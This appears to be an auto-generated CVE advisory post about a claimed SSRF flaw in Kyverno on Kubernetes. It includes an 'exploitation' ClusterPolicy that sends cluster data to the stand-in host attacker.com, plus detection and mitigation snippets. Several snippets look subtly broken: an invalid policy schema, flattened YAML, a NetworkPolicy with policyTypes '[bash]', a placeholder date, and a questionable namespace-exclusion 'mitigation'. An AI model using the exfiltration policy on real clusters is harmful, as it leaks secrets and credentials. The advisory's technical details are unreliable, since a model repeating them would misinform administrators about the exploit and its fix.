How the CVE Works
Kyverno’s Service Call functionality in Kubernetes allows policies to fetch external data. The vulnerability arises when an attacker-controlled Kyverno policy abuses this feature to perform SSRF. By crafting a malicious `ClusterPolicy` with an external URL in the `service.url` field, the attacker forces Kyverno to send HTTP requests to an external server, exfiltrating sensitive cluster data like secrets. The policy’s `apiCall` method, meant for internal services, fails to validate external domains, enabling data leakage via HTTP requests to attacker-controlled hosts.
DailyCVE Form
Platform: Kubernetes (Kyverno)
Version: <1.10.2
Vulnerability: SSRF
Severity: Critical
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
1. Policy Injection:
apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: malicious-ssrf spec: rules: - name: exfiltrate-data service: url: http://attacker.com/exfil
2. Trigger Request:
kubectl apply -f malicious-policy.yaml kubectl create configmap dummy --from-literal=key=value
Detection:
1. Audit Policies:
kubectl get clusterpolicies -o yaml | grep "service.url"
2. Monitor Outbound Traffic:
kubectl logs -n kyverno -l app=kyverno --tail=100 | grep "external"
Mitigation:
1. Patch Kyverno:
helm upgrade kyverno kyverno/kyverno --version 1.10.2
2. Network Policies:
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: deny-kyverno-egress spec: podSelector: matchLabels: app: kyverno policyTypes: [bash] egress: []
3. Admission Control:
kubectl label ns kyverno-admission webhook.kyverno.io/exclude=true
Impact Analysis:
- Data Exfiltration: Secrets, configmaps, tokens.
- Cluster Compromise: Lateral movement via stolen credentials.
References:
- Kyverno SSRF Fix: GitHub Commit
- CVE Details: NVD
No additional commentary.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
